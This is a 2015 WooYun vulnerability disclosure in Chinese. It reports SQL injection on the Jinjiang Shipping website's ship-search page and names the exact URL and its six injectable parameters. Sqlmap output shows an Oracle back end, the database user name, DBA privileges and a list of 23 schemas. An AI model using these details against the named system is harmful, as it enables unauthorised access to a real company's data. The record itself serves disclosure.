当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151281

漏洞标题:锦江航运主站sql注入(影响23裤/DBA权限)

相关厂商:锦江航运

漏洞作者: 路人甲

提交时间:2015-11-03 10:21

修复时间:2015-12-18 10:22

公开时间:2015-12-18 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

在查询机票的地方

http://ejj.jjshipping.cn/eservices/shipsearch.jsp?startcon=CN&startPort=CNDLC&beginDate=2015-07-01&endDate=2015-07-31&endcon=CN&endPort=CNDLC


好可怕,辣么多参数,都可以注入

there were multiple injection points, please select the one to use for followi
 injections:
[0] place: GET, parameter: startcon, type: Single quoted string (default)
[1] place: GET, parameter: startPort, type: Single quoted string
[2] place: GET, parameter: beginDate, type: Single quoted string
[3] place: GET, parameter: endDate, type: Single quoted string
[4] place: GET, parameter: endcon, type: Single quoted string
[5] place: GET, parameter: endPort, type: Single quoted string
[q] Quit
>
[14:57:23] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:57:23] [INFO] fetching current user
current user:    'LSP_SHJJHY'


dba权限

[15:01:20] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:01:20] [INFO] testing if current user is DBA
current user is DBA:    'True'


available databases [23]
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] JJOA
[*] JJWEB
[*] LSP_SHJJHY
[*] MDSYS
[*] NC57
[*] NC57TEST
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAMIS45QD
[*] SAMIS_JC
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝